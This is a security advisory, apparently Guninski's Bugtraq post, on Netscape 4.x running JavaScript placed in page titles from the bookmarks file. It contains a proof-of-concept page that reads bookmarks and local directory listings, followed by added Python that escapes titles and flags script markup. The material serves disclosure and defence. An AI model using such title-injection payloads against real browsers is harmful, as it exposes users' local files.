There is a security bug in Netscape Communicator 4.51 Win95, 4.07 Linux (guess all 4.x versions are affected) in the way they handle special bookmarks with JavaScript code in the title.

If you enclose JavaScript code in <SCRIPT> tags inside the <TITLE> tag and bookmark that page, the JavaScript code is written into the local bookmarks file. Then, when the bookmarks file is opened, the JavaScript code is executed in the security context of a local file - the bookmarks file. The bookmarks file may be opened by a script, probably a server redirect, or by the user. The bookmarks file name must be known, but it is easily guessed for most dialup users.

Vulnerabilities: reading the user's bookmarks, browsing local directories, reading local files (works fine on Linux, probably possible on Windows).

Workaround: Disable JavaScript or do not bookmark untrusted pages.

Demonstration is available at: http://www.nat.bg/~joro/book2.html

See attached file for the source.
Georgi Guninski
http://www.nat.bg/~joro
http://www.whitehats.com/guninski

--------------------------------------------------------------------------

<http://www.nat.bg/~joro/book2.html>

<HTML><HEAD>
<TITLE>
<SCRIPT>
alert('Bookmarks got control');
s='Here are some bookmarks: \n';
for(i=1;i<7;i++)
  s += document.links[i]+'\n';
alert(s);
dirToRead='wysiwyg://2/file://c:/';
a=window.open(dirToRead);
s='Here are some files in C:\\ :\n';
for(i=1;i<7;i++)
  s += a.document.links[i]+'\n';
a.close();
alert(s);
</SCRIPT>

There is a security bug in Netscape Communicator 4.51 Win95, 4.07 Linux (guess all 4.x versions are affected) in the way they handle special bookmarks with JavaScript code in the title.
If you enclose JavaScript code in <SCRIPT> tags inside the <TITLE> tag and bookmark that page, the JavaScript code is written into the local bookmarks file. Then, when the bookmarks file is opened, the JavaScript code is executed in the security context of a local file. The bookmarks file may be opened by a script, probably a server redirect, or by the user. The bookmarks file name must be known - easily guessed for most dialup users.
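The root cause in Guninski's report is that the browser copies a page title into bookmarks.html as raw markup, so anything that looks like a tag in the title becomes live content the next time the file is rendered as a local page. The Python below is an added example written for this issue; it is not Netscape's code and not part of the Bugtraq post. It shows the two things a defender wants: the serializer-side fix (escape the title before it is written, so `<`, `>`, `&` and quotes can only ever render as text) and an audit that scans an existing bookmarks file for entries whose title carries script or handler markup, rewriting them to plain text. The sample file is constructed here in the NETSCAPE-Bookmark-file-1 layout with the date attributes left out, and the example.invalid / attacker.invalid hosts are placeholders.

```python
import html
import re

# Constructed sample bookmarks file (simplified NETSCAPE-Bookmark-file-1 layout;
# the real file also carries ADD_DATE and similar attributes). The second entry
# is what a page with a <SCRIPT> block in its <TITLE> leaves behind once it is
# bookmarked. Host names are placeholders.
SAMPLE_BOOKMARKS = """<!DOCTYPE NETSCAPE-Bookmark-file-1>
<TITLE>Bookmarks</TITLE>
<H1>Bookmarks</H1>
<DL><p>
    <DT><A HREF="http://example.invalid/news">Daily news</A>
    <DT><A HREF="http://attacker.invalid/page">Welcome <SCRIPT>alert('Bookmarks got control')</SCRIPT></A>
    <DT><A HREF="http://example.invalid/docs">Docs &amp; manuals</A>
</DL><p>
"""

# One bookmark anchor: the opening tag (with its HREF), the title text, the close.
ENTRY_RE = re.compile(r'(<A\s+HREF="([^"]*)"[^>]*>)(.*?)(</A>)',
                      re.IGNORECASE | re.DOTALL)

# Markup inside a title that a browser would act on when the file is rendered.
LIVE_MARKUP_RE = re.compile(
    r'<\s*script\b|javascript:|\bon(load|click|error|mouseover)\s*=',
    re.IGNORECASE)


def safe_title(title):
    """Serializer-side fix: a page title is data, so escape it before it is
    written into bookmarks.html. Whitespace runs (including newlines) are
    collapsed so a multi-line title cannot reshape the surrounding markup."""
    return html.escape(" ".join(title.split()), quote=True)


def make_entry(href, title):
    """Build one bookmark line the way a fixed serializer should."""
    return '<DT><A HREF="%s">%s</A>' % (html.escape(href, quote=True),
                                        safe_title(title))


def audit_bookmarks(text):
    """Detection: return (href, title) for every entry whose title text still
    contains live markup, i.e. the condition the advisory describes."""
    return [(href, title)
            for _open, href, title, _close in ENTRY_RE.findall(text)
            if LIVE_MARKUP_RE.search(title)]


def sanitize_bookmarks(text):
    """Rewrite an existing file so every title is plain text. Entities that
    are already escaped are decoded first, so 'Docs &amp; manuals' is not
    turned into 'Docs &amp;amp; manuals'."""
    def fix(m):
        return m.group(1) + safe_title(html.unescape(m.group(3))) + m.group(4)
    return ENTRY_RE.sub(fix, text)


if __name__ == "__main__":
    for href, title in audit_bookmarks(SAMPLE_BOOKMARKS):
        print("live markup in title of %s: %r" % (href, title))
    print(sanitize_bookmarks(SAMPLE_BOOKMARKS))
```

Running it flags only the attacker.invalid entry; after `sanitize_bookmarks` the same audit returns nothing, the script text survives as visible `&lt;SCRIPT&gt;...` characters, and the already-escaped `&amp;` in the third entry is left alone. The audit regex is a heuristic (it looks for a handful of handler names and `javascript:`), so treat a hit as something to inspect rather than proof; the escaping in `safe_title` is the actual fix, because it makes the question of what the title contains irrelevant.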